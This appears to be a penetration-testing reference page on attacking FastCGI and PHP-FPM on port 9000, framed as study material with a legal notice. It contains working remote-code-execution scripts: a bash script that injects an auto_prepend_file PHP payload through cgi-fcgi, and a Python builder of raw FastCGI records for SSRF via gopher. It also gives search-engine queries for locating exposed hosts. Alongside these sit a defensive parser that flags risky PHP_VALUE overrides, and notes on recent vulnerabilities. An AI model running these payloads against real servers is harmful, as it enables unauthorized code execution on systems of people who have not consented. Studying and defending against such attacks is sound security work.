---
title: "9000 - Fastcgi"
weight: 9000
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

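💡 **Study tip**: This document covers penetration-testing methods for **9000 - FastCGI** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for study and authorized testing only. Testing systems without authorization may violate laws and regulations.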

---

## 9000 Pentesting FastCGI

### Basic Information

If you want to **learn what FastCGI is**, check the following page:

pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md

By default **FastCGI** runs on **port 9000** and isn't recognized by nmap. **Usually** FastCGI only listens on **localhost**.

### Enumeration / Quick checks

* **Port scan:** `nmap -sV -p9000 <target>` (will often show "unknown" service; manually test).
* **Probe FPM status page:** `SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000` (default php-fpm `pm.status_path`).
* **Find reachable sockets via SSRF:** if an HTTP service is exploitable for SSRF, try `gopher://127.0.0.1:9000/_...` payloads to hit the FastCGI listener.
* **Nginx misconfigs:** `cgi.fix_pathinfo=1` with `fastcgi_split_path_info` errors let you append `/.php` to static files and reach PHP (code exec via traversal).

### Remote Code Execution

It's quite easy to make FastCGI execute arbitrary code:

<details>
<summary>Send FastCGI request that prepends PHP payload</summary>

```bash
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" 
FILENAMES="/var/www/public/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done
```

</details>

Or you can use the following Python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)

#### SSRF/gopher to FastCGI (when 9000 is not directly reachable)

If you only control an **SSRF** primitive, you can still hit FastCGI using the gopher scheme and craft a full FastCGI request. Example payload builder:

<details>
<summary>Build and send a gopher FastCGI RCE payload</summary>

```python
import struct, socket
host, port = "127.0.0.1", 9000
params = {
    b"REQUEST_METHOD": b"POST",
    b"SCRIPT_FILENAME": b"/var/www/html/index.php",
    b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"
}
body = b"<?php system('id'); ?>"

def rec(rec_type, content, req_id=1):
    return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content

def enc_params(d):
    out = b""
    for k, v in d.items():
        out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
    return out
payload  = rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
payload += rec(5, body)                                # FCGI_STDIN

s = socket.create_connection((host, port))
s.sendall(payload)
print(s.recv(4096))
```

Convert `payload` to URL-safe base64/percent-encoding and send via `gopher://host:9000/_<payload>` in your SSRF.
</details>
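
The defender's view of the request built above, as an added example (not code from the original page or from php-fpm): a parser for captured FastCGI bytes that reassembles the `FCGI_PARAMS` stream, bounds-checks the name/value lengths, and flags `PHP_VALUE`/`PHP_ADMIN_VALUE` overrides. The function names, the directive list and the sample bytes are constructed for illustration.

```python
import struct

FCGI_PARAMS = 4  # record type that carries the request's name-value pairs
OVERRIDE_PARAMS = (b"PHP_VALUE", b"PHP_ADMIN_VALUE")  # applied by php-fpm as php.ini overrides
RISKY = (b"auto_prepend_file", b"auto_append_file", b"allow_url_include")

def records(stream):  # yield (type, request_id, content); a trailing partial header is ignored
    pos = 0
    while pos + 8 <= len(stream):
        _v, rtype, req_id, clen, plen, _r = struct.unpack_from("!BBHHBB", stream, pos)
        if pos + 8 + clen > len(stream):
            raise ValueError("truncated record")
        yield rtype, req_id, stream[pos + 8:pos + 8 + clen]
        pos += 8 + clen + plen  # skip content and padding

def _length(buf, pos):  # one length field: 1 byte, or 4 bytes when the high bit is set
    if pos < len(buf) and buf[pos] < 0x80:
        return buf[pos], pos + 1
    if pos + 4 > len(buf):
        raise ValueError("truncated length")
    return struct.unpack_from("!I", buf, pos)[0] & 0x7FFFFFFF, pos + 4

def pairs(buf):  # decode name-value pairs; reject lengths that run past the buffer
    pos = 0
    while pos < len(buf):
        nlen, pos = _length(buf, pos)
        vlen, pos = _length(buf, pos)
        if pos + nlen + vlen > len(buf):
            raise ValueError("name/value length exceeds params data")
        yield buf[pos:pos + nlen], buf[pos + nlen:pos + nlen + vlen]
        pos += nlen + vlen

def findings(stream):  # return (request_id, param, directives) for risky overrides
    params, out = {}, []
    for rtype, req_id, content in records(stream):
        if rtype == FCGI_PARAMS:  # PARAMS is a stream: join its records per request
            params[req_id] = params.get(req_id, b"") + content
    for req_id, buf in params.items():
        for name, value in pairs(buf):
            hits = [d.decode() for d in RISKY if d in value]
            if name in OVERRIDE_PARAMS and hits:
                out.append((req_id, name.decode(), hits))
    return out

# Constructed sample: one params stream split mid-pair across two PARAMS records
_nv = lambda n, v: bytes([len(n), len(v)]) + n + v
_P = _nv(b"REQUEST_METHOD", b"GET") + _nv(b"PHP_VALUE", b"auto_prepend_file=php://input")
SAMPLE = b"".join(struct.pack("!BBHHBB", 1, 4, 1, len(c), 0, 0) + c for c in (_P[:30], _P[30:], b""))
print(findings(SAMPLE))
```

Feed it reassembled TCP payloads from the FastCGI port and compare any hit against the overrides your web server is actually configured to send.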

#### Notes on recent issues

* **libfcgi <= 2.4.4 integer overflow (2024):** crafted `nameLen`/`valueLen` in FastCGI records can overflow on 32‑bit builds (common in embedded/IoT), yielding heap remote code execution when the FastCGI socket is reachable (directly or via SSRF).
* **PHP-FPM log manipulation (CVE-2024-9026):** when `catch_workers_output = yes`, attackers who can send FastCGI requests may truncate or inject up to 4 bytes per log line to erase indicators or poison logs.
* **Classic Nginx + cgi.fix_pathinfo misconfig:** still widely seen; if `fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;` is used without file existence checks, any path ending in `.php` gets executed, enabling path traversal or source overwrite style gadgets.

---


### Search Engine Syntax

#### FOFA

```bash
# FOFA search syntax
port="9000"
```

#### Shodan

```bash
# Shodan search syntax
port:9000
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:9000
```

---

## 📖 References

- [HackTricks - 9000-fastcgi](https://book.hacktricks.wiki/en/network-services-pentesting/9000-fastcgi.html)

